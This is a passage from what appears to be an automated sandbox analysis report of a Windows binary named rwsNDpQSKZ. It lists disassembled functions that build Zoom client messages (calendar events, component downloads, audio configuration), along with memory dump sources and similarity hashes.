                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.cancelinvitebyphone.request
                • API String ID: 3166440930-2625813029
                • Opcode ID: aa7b33d3e76518573d616126a27d1e10c3389926334c088bb176532897da4b61
                • Instruction ID: d40b78427ef8da5310376395e9e890281b4818e5d91bdeea571242d29ca0d01d
                • Opcode Fuzzy Hash: aa7b33d3e76518573d616126a27d1e10c3389926334c088bb176532897da4b61
                • Instruction Fuzzy Hash: 2EE0DFB0A003C0A7D720AB51DC46B2E6AB4EB90B56F404A6CB2095B3D2CBF68984C775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A807
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notifyReceivedAppSelected,00002731,Ack,00000004), ref: 00C6A822
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Ack$com.Zoom.app.pt.notifyReceivedAppSelected
                • API String ID: 3166440930-4288858343
                • Opcode ID: c21d55cd5bf65f64b6ba02505c94cb77c71331ad1e73341a772ee6b4e6e8240d
                • Instruction ID: 30c6f93de05fab91f62358fa51e30294ab64fd5dad6138bac56cc493d7108966
                • Opcode Fuzzy Hash: c21d55cd5bf65f64b6ba02505c94cb77c71331ad1e73341a772ee6b4e6e8240d
                • Instruction Fuzzy Hash: 62E0D8B490038097D720AB105C89B1E67B4DB94716F54042CB6055F3D2CBF84984D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C837
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.pt.process.id.notification,00009D09,ProcessID,00000004), ref: 00C6C852
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ProcessID$com.zoom.app.assistant.pt.process.id.notification
                • API String ID: 4281283084-2779137744
                • Opcode ID: ec0303b1c5cd081d91fe1d00f3348e2503f5673c867bda3c4defdcef00788cee
                • Instruction ID: d45e9c616571c38380e7283c06ac65c8c850abe3e8f83964ca7e9c51b87bcff3
                • Opcode Fuzzy Hash: ec0303b1c5cd081d91fe1d00f3348e2503f5673c867bda3c4defdcef00788cee
                • Instruction Fuzzy Hash: 9CE0D8B0A1434067C3307B144C5571E26A49B90B15F500429B1415B3D2DBF48844EBB6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72997
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.setdomain.request,00009E8E,Domain,00000004), ref: 00C729B2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Domain$com.zoom.app.cci.ccivideo.setdomain.request
                • API String ID: 3166440930-4034010316
                • Opcode ID: be3def2c18f53bea3e1de4f978ea9b6fc44d926445ea11555b67680be3fa6a35
                • Instruction ID: 13540477c5dea676653b10a431ebf89b8a805851d30bc9edd34780b72970eae0
                • Opcode Fuzzy Hash: be3def2c18f53bea3e1de4f978ea9b6fc44d926445ea11555b67680be3fa6a35
                • Instruction Fuzzy Hash: EAE0D8B0A003C4A7C7106B519C45B1F66A49F44726F04452CB2055F3D2CBF44884DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C769A7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.cancel.download.component,00013888,componentType,00000004), ref: 00C769C2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.cancel.download.component$componentType
                • API String ID: 4281283084-2242886927
                • Opcode ID: 3f43cca50bdf2bd656549742780f9448e3e6654dc34d8c715cb2a1a5f339e578
                • Instruction ID: e74626fa1b939be79d08e9ebfe269559c80da787de9123e61457c810f90f852e
                • Opcode Fuzzy Hash: 3f43cca50bdf2bd656549742780f9448e3e6654dc34d8c715cb2a1a5f339e578
                • Instruction Fuzzy Hash: 01E0D8B1A4078067D7207B149C4A75E66A4AB50B16F90096CF2055B3C2CFF44941EB78
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C9B7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.configure.request,00009C5F,jsonValue,00000004), ref: 00C6C9D2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.audio.configure.request$jsonValue
                • API String ID: 3166440930-816642334
                • Opcode ID: 23d915346cf3fb91cdee7da55f2bb712c821c664a8bc35873f9e64368e62b76c
                • Instruction ID: ff825e0b920b616bcd8c776df4d892bc610b77fa619e05fa880020e47cf61d33
                • Opcode Fuzzy Hash: 23d915346cf3fb91cdee7da55f2bb712c821c664a8bc35873f9e64368e62b76c
                • Instruction Fuzzy Hash: CBE0D8B4A0038067D720BB104C55B1E7AB4F740715F44061CF3015B393CBF48984DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76947
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.start.download.component,00013887,componentType,00000004), ref: 00C76962
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.start.download.component$componentType
                • API String ID: 4281283084-2386146565
                • Opcode ID: 5b6bd6de0be6eba5d80a3d697416ca3eec697899f4e2464de4ba4e7d38125cd4
                • Instruction ID: 5c7f04689043f5fd957ef33c3e94a5fa858e7f0df4d5c93efe2b0e9054f6f4ff
                • Opcode Fuzzy Hash: 5b6bd6de0be6eba5d80a3d697416ca3eec697899f4e2464de4ba4e7d38125cd4
                • Instruction Fuzzy Hash: 9AE0D8F0A4078067C721BB144C4975E76A4AB90716F50066CF1455B392DBF84940D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C957
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.mapi.calendar.events.notify,00009E6B,outJsonEvents,00000004), ref: 00C5C972
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
